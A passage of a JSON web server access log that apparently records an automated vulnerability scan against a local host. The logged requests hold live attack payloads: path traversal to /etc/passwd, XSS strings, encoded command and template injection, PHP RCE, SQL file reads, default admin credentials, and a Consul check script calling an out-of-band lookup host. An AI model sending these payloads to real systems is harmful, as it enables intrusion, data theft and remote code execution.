HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.906","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:58 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/adaptive-images/adaptive-images-script.php/%3Cimg/src/onerror=alert(document.domain)%3E/?debug=true HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.375","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:58 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /blast/nph-viewgif.cgi?../../../../etc/passwd HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.364","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:58 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET ///bin///wcm///search///gql.json;%0aa.png?query=type:base%20limit:..1&pathPrefix= HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"1.034","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:58 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /plc/webvisu.htm HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.329","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:58 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /cfusion/debug/cf_debugFr.cfm?userPage=javascript:alert(1) HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.340","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:58 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /.json/FNZ.png HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"1.216","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:58 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /new/newhttp://example.com HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.296","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:58 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /adserve/www/delivery/lg.php?dest=http://example.com HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.297","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:58 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /wp-admin/admin.php?page=wpo_wcpdf_options_page§ion=%22+style%3Danimation-name%3Arotation+onanimationstart%3Dalert%28document.domain%29+x%3D HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.378","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:58 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.379","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:58 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /t/index.php?action[]=aaaa HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.393","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:58 +0000","request_body":"fullPath=/Windows/win.ini","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"POST /fileDownload?action=downloadBackupFile HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.385","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:58 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /api/v4/users/31 HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.341","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:58 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET ///example.com/ HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.342","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:58 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /cgi-bin/wapopen?B1=OK&NO=CAM_16&REFRESH_TIME=Auto_00&FILECAMERA=../../etc/passwd%00&REFRESH_HTML=auto.htm&ONLOAD_HTML=onload.htm&STREAMING_HTML=streaming.htm&NAME=admin&PWD=admin&PIC_SIZE=0 HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.250","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:58 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /glpi/plugins/barcode/front/send.php?file=../../../../../../../../etc/passwd HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.243","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:58 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /catalog-portal/ui/oauth/verify?error=&deviceUdid=%24%7b%22%66%72%65%65%6d%61%72%6b%65%72%2e%74%65%6d%70%6c%61%74%65%2e%75%74%69%6c%69%74%79%2e%45%78%65%63%75%74%65%22%3f%6e%65%77%28%29%28%22%63%61%74%20%2f%65%74%63%2f%68%6f%73%74%73%22%29%7d HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.279","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:58 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /sess-bin/login_session.cgi HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.245","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:58 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET ///bin///wcm///search///gql.json;%0aa.ico?query=type:base%20limit:..1&pathPrefix= HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.271","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:58 +0000","request_body":"{\x22entry\x22:\x22Evil\x22,\x22request\x22:\x22id\x22}","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"POST /plugin/customMethod HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.912","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:58 +0000","request_body":"lang=en_US&cat_id=6\x22>&action=jnews_build_mega_category_2&number=6&tags=70%2C64%2C10%2C67","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"POST /?ajax-request=jnews HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.259","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:58 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/wp-swimteam/include/user/download.php?file=/etc/passwd&filename=/etc/passwd&contenttype=text/html&transient=1&abspath=/usr/share/wordpress HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.269","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:58 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /index.php?sl=../../../../../../../etc/passwd%00 HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.334","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:58 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /console-selfservice/SelfService.do HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.884","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:58 +0000","request_body":"amty_hidden=1","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"POST /wp-content/plugins/amty-thumb-recent-post/amtyThumbPostsAdminPg.php?%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E=1 HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.369","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:58 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /api/v4/users/32 HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.361","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:58 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /install/lib/ajaxHandlers/ajaxServerSettingsChk.php?rootUname=%3b%63%61%74%20%2f%65%74%63%2f%70%61%73%73%77%64%20%23 HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.384","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:58 +0000","request_body":"command1=shell%3Acat /etc/passwd|dd of=/tmp/poc.txt","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"POST /(download)/tmp/poc.txt HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.325","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:58 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET ///bin///wcm///search///gql.json///a.css?query=type:base%20limit:..1&pathPrefix= HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.267","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:58 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /app/welcome/default/ HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"1.743","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:58 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /whoAmI/ HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.968","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:58 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"POST /v1/graphiql.php HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.629","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:58 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/gtranslate/ HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.271","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:58 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /standard/default.php HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.637","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:58 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /index.php?s=weibo/Share/shareBox&query=app=Common%26model=Schedule%26method=runSchedule%26id[status]=1%26id[method]=Schedule-%3E_validationFieldItem%26id[4]=function%26[6][]=%26id[0]=cmd%26id[1]=assert%26id[args]=cmd=system(ver) HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.981","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:58 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /storage/ HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.328","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:59 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /.json/FNZ.ico HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.694","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:59 +0000","request_body":"loginUsername=admin&loginPassword=axis2","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"POST /axis2-admin/login HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.359","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:59 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /openam/XUI/ HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.326","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:59 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET ///example.com@/ HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.638","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:59 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /phpwiki/index.php/passwd HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.317","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:59 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /apc/apc.php HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.362","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:59 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET ///bin///wcm///search///gql.json///a.ico?query=type:base%20limit:..1&pathPrefix= HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.243","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:59 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"28fHqRoNIEZ7wlKjlqGKczSlsKV.tld","request":"GET / HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.350","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:59 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /Devices-Config.php?sta=%22%3E%3Cimg%20src%3Dx%20onerror%3Dalert(document.domain)%3E HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.652","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:59 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /wp-content/uploads/wpdm-cache/ HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.330","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:59 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /api/v4/users/33 HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.388","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:59 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /prometheus HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.645","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:59 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /camunda/app/welcome/default/ HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.309","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:59 +0000","request_body":"{\x0D\x0A \x22ID\x22: \x2228fHqPUPSMkr3Uk5gOqp2AmH7BU\x22,\x0D\x0A \x22Name\x22: \x2228fHqPUPSMkr3Uk5gOqp2AmH7BU\x22,\x0D\x0A \x22Address\x22: \x22127.0.0.1\x22,\x0D\x0A \x22Port\x22: 80,\x0D\x0A \x22check\x22: {\x0D\x0A \x22script\x22: \x22nslookup c9oms3gsmpve1ijt0mc0mku6iimu8ojhz.oast.live\x22,\x0D\x0A \x22interval\x22: \x2210s\x22,\x0D\x0A \x22Timeout\x22: \x2286400s\x22\x0D\x0A }\x0D\x0A}","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"PUT /v1/agent/service/register HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.294","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"PUT", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:59 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /RichWidgets/Popup_Upload.aspx HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.298","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:59 +0000","request_body":"_dlg[captcha][target]=system(\x5C'ver\x5C')\x5C","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"POST /webmail/basic/ HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.305","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:59 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"-","request":"GET /%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd HTTP/1.1","status":"400","body_bytes_sents":"154","req_time":"0.001","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:59 +0000","request_body":"log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"POST /wp-login.php HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.739","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:59 +0000","request_body":"{\x0D\x0A \x22type\x22: \x22bulk\x22,\x0D\x0A \x22source\x22: \x22default\x22,\x0D\x0A \x22args\x22:[\x0D\x0A {\x0D\x0A \x22type\x22: \x22run_sql\x22,\x0D\x0A \x22args\x22: {\x0D\x0A \x22source\x22:\x22default\x22,\x0D\x0A \x22sql\x22:\x22SELECT pg_read_file('/etc/passwd',0,100000);\x22,\x0D\x0A \x22cascade\x22: false,\x0D\x0A \x22read_only\x22: false\x0D\x0A }\x0D\x0A }\x0D\x0A ]\x0D\x0A}","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"POST /v2/query HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.339","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:59 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"","request":"GET /etc/passwd HTTP/1.1","status":"400","body_bytes_sents":"154","req_time":"0.001","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:59 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /api_smartapp/storage/ HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.291","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:59 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /adserver/www/delivery/lg.php?dest=http://example.com HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.394","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", 